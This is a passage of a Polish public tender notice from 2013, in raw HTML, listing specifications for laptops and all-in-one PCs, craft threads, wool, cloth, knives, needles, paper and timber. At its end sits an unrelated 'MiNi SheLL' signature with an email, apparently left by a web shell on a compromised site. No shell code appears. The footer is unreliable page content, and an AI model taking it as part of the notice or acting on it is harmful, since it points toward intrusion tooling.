Torba do laptopa: Tak 

Komputer nr 2 (notebook):
Typ: komputer przenośny typu notebook
Przekątna ekranu: 17-17,9 cala
Procesor: Intel serii i-3 lub równoważny osiągający w teście PassMark
CPU wynik minimum 3836 punktów
Liczba gniazd USB 3.0: 2 szt.
Liczba gniazd USB 2.0: 2 szt.
Dysk twardy: min. 750 GB
Pamięć operacyjna: 6GB
System operacyjny: Windows 7 / 8 / nowszy lub równoważny. 
Oprogramowania: Pakiet MS Office 2010 lub równoważny
Za pakiet równoważny uważa się taki, w którym bezproblemowo można
otwierać pliki formatów docx, xlsx, pptx.
Gwarancja: 24 miesięcy
Torba do laptopa: Tak (kolor: czarna)

Komputer nr 3 (stacjonarny)
Obudowa: Typu All-in-One
Płyta główna: zaprojektowana na zlecenie producenta jednostki centralnej komputera, zintegrowana z monitorem tzw. All-in-One
Przekątna ekranu: 18 cala
Procesor: Intel serii i-3 lub równoważny osiągający w teście PassMark CPU wynik minimum 4032 punktów
Liczba gniazd USB: 3
Dysk twardy: min. 500 GB
Pamięć operacyjna: min. 4GB
Akcesoria bezprzewodowe: mysz i klawiatura
System operacyjny: Zainstalowany Windows 7 / 8 / nowszy lub równoważny. 
Oprogramowania: Pakiet MS Office 2010 lub równoważny.  Za pakiet równoważny uważa się taki, w którym bezproblemowo można otwierać pliki formatów docx, xlsx, pptx.
Gwarancja: min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.65.10.00-3, 38.65.16.00-9, 38.65.21.00-1, 30.21.30.00-5, 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nici lniane - 80 kg 
Nici bawełniane - 40 kg 
Nici wełniane - 65 kg 
Wełna czesankowa - 25 kg 
Płótno - 60 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nici lniane - 80 kg 
Nicie lniane gat. I koloru: naturalnego, zielonego, białego, malachitowego, błękitu królewskiego i innych od grubości nr 10 i cieńszych. Dokładna ilość każdego koloru i grubości określi przed dostawą Zamawiający.
Nici bawełniane - 40 kg 
Nicie bawełniane gat. I o grubości Nm 40/6, 10 i cieńszych koloru białego, błękitu królewskiego, bursztynowego, zgniłej zieleni, oliwkowego i innych kolorów oraz nicie bawełniane z domieszką akrylanu różnych kolorów i różnej grubości od Nr10 do 56 grubości. Dokładna ilość każdego koloru i grubości określi przed dostawą Zamawiający.
Nici wełniane - 65 kg 
Nici wełniane gat. I różnych kolorów i o różnym składzie zawartości wełny: 100% wełny, 50 % wełny z domieszką akrylanu, 30% wełny z domieszką akrylanu. Nici powinny być różnej grubości: od Nr 8/3 do grubszych i w różnych kolorach. Najwięcej potrzeba zielonego, szmaragdowego, miodowego, rubinowego, błękitu królewskiego, oliwkowego, czekoladowego, makowego, lawendowego, czarnego i w mniejszych ilościach innych kolorów. Dokładna ilość każdego koloru i grubości określi przed dostawą Zamawiający.
Wełna czesankowa - 25 kg 
Wełna czesankowa gat. I potrzebna do filcowania i przetykania na tkaninie. Musi być dobrze zgręplowana, o długim włosiu. Wymagana jest cała gama kolorów tak jak do malowania, ale najwięcej koloru zielonego, zgniłej zieleni, malachitu, szmaragdowego, miodowego, cytrynowego, złotego, miedzianego, rubinowego, makowego, błękitu królewskiego, białego, szarego, czarnego i innych. Dokładna ilość każdego koloru i grubości określi przed dostawą Zamawiający.
Płótno - 60 m 
Tkanina lniana do szycia odzieży etnicznej koloru naturalnego, białego, rubinowego, błękitu królewskiego, oliwkowego, zielonego, herbacianego i innych kolorów. Tkanina wełniana typu sukno lub inna podobna tkanina. Płótno winno być o różnej grubości:125g/mkw., 195g/mkw., 150g/mkw., 240g/mkw. Szerokość materiału -150cm.  Dokładna ilość każdego koloru i grubości określi przed dostawą Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.43.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Scyzoryki, noże, igły, papier, itp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Scyzoryki, noże, igły, papier, itp. 
a) noże do cięcia papieru - 13szt
b) papier brystol do wycinanek w kolorach: malachitowy, oliwkowy, tycjan, zielony, ciemnofioletowy o formacie B-1 po 12 arkuszy każdego koloru (razem 60 szt)
c) scyzoryki do rzeźbienia w drewnie z jednym ostrzem wykonane z wysoko jakościowej stali - 5szt.
d) 10 kompletów igieł z uchwytem do filcowania wełny
e) 10 igieł tapicerskich zakrzywionych,
f)  10 igieł grube, długie 6-8 cm nieostre,
g) dziurkacze ozdobne: 
- margaretka midi - szt. 1
- łezki II - szt. 1
- listwa ornament  - szt. 1
- listwa diamenciki - szt. 1
- stokrotki (listwa brzegowa) - szt. 1
- brzegowy z listwą (wkładka muszelki) - szt 1
h) nożyczki do precyzyjnego cięcia, metalowe - 5 szt
i)  nożyczki do papieru metalowe o długości ostrza ok. 10 cm - 12 szt
j)  nożyczki dekoracyjne o różnorodnych ostrzach - 1 kpl
k) antyramy do wycinanek z plexy o formacie B1 szt - 13
ł)farby akrylowe do malowania  na drewnie w kolorach  żółty-200ml. Biały 200ml. Zielony w dwóch odcieniach po 200ml. ,niebieski w dwóch odcieniach po 200ml..czerwony ciemny 200ml., lub komplet w podobnych kolorach i ilościach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.70.00-9, 30.19.73.30-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Deski - 5 m3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deski - 5 m3 
Deski o następujących parametrach:
1m3 - tarcica, brzoza o grubości 5cm bez oflisów
2m3 - deski sosna o grubości 20mm
1m3 - brzoza o grubości 15 mm
1m3 - sklejka lub deska o podobnej grubości
Deski powinny być o szerokości 15-25 cm, dobrze oszlifowane o wilgotności 8 - 14%..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.19.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com